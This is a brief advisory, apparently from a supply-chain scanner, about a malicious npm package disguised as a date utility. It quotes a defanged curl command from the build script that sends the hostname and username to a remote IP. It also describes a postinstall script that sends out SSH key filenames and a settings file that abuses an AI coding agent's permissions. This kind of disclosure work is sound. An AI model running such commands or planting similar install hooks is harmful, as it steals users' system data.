houzidawang808@1.0.0
Malicious code in houzidawang808 (npm)
Analysis
Package houzidawang808@1.0.0 masquerades as a simple date formatting utility but ships a system-reconnaissance and data-exfiltration payload. The build script (`curl hxxp://124[.]221[.]154[.]135//pre?h=$(hostname)&u=$(whoami)`) transmits the victim's hostname and username to a remote IP. A bundled script (postinstall.js) collects SSH public key filenames from ~/.ssh/, the system username, and platform type, then exfiltrates them as JSON to the same IP (124[.]221[.]154[.]135:443) via HTTPS POST. A configuration file (`.claude/settings.local.json`) grants broad npm-config permissions to abuse the Claude Code agentic tool. The publisher has previously distributed malicious packages under the same identity.
- analyzed by
- Leitwacht
- first seen
- Jun 13, 2026, 06:23 AM
- analyzed
- Jun 13, 2026, 06:24 AM
Related advisories
- redeem-onchain-sdk@1.0.1
- warp-dependency@1.0.0
- react-copy-lite@1.0.1
- chalk-pro@7.0.4
- prisma-callback@1.0.0
- poxios-chain@1.3.5
- coral-wraith@1.0.4
- npm-scanner@1.0.0
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.